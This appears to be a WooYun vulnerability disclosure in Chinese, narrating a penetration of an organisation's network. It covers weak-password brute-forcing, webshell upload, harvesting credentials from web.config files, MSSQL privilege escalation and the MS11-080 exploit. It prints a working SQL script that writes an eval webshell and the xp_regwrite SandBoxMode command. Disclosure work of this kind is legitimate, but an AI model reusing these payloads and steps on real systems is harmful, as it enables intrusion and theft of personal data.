WooYun.org

主站见到一个无域名的系统链接,进入

找到上传文件的地址,发现地址里面有用户名 users/admin

获得大量用户名

因为没有验证码,所以用burp跑了弱口令,获得大量可登录账户,选择了ccgl/123456

上传点无限制,一句话

jsp权限一般都是administrator,直接net user add

由于是内网主机,所以lcx 3389转发出来,至此边界突破

在DE盘发现若干网站和数据库备份,随后全盘搜索web.config,获得大量数据库连接用户名和密码(下图中有部分是从其他服务器上搜集的)

通过其中一个连接上了**.**.**.** sa权限 sql2000的企业客户端是不支持直接查询exec的,所以下了个navicat连上

这个数据库提权是我遇到的比较棘手的一个 xp_cmdshell肯定是禁了没跑,恢复失败
随后尝试SP_OAcreate,虽然提示执行成功,但其实没有起到作用
然后用xp_regwrite开启沙盒模式,用select * From OpenRowSet执行命令失败提示

xpsql.cpp: 错误 5 来自 CreateProcess

然后扫了下端口发现开着80

进去翻了会虽然有上传点但是没有上传目录(直接通过download.aspx?id的方式下载的)
然后便用sql的xp_dirtree找这个网站的根目录

猜测是weboa_sj,于是进入看看,对比web目录
然后发现结构一致,直接写入aspx一句话

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'd:\weboa_sj\oneaspx.aspx', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<%@ Page Language="Jscript"%><%eval(Request.Item["1"],"unsafe");%>'

上菜刀连,是默认的iis低权帐号,无法net user add

随后systeminfo看补丁,发现没打ms11080.exe的

直接上ms11080溢出拿到administrator权限的用户,90sec/90sec mstsc连上

主站和oa都在,数据库里有很多别的子站连接过来的,可以通过这个获取密码进一步渗透其他子站的服务器
同时DE盘还有大量的考试站点和数据库备份,以及考生的详细资料

在**.**.**.**上也获得了大量的web.config,从里面提取出了用户名以及密码统一和上一份何在一起做了个user.txt和pass.txt,然后丢进hscan跑mssql

这些都是跑出来的,没有第一台那么难提,直接开沙盒模式

exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后select * From OpenRowSet执行net user add 都拿下

内网的大部分数据库服务器应该都是这些了,可以通过这个大量入侵内网开了http服务的服务器
渗透测试至此结束,未再深入 注:在两台服务器上已发现入侵痕迹 **.**.**.**:

入侵日期大概在07年8月左右
另一台忘记是哪台了,在里面看到了大量的木马,另外官网有些时候会被劫持跳转到抽奖什么的,可能是因为主页被人篡改加了js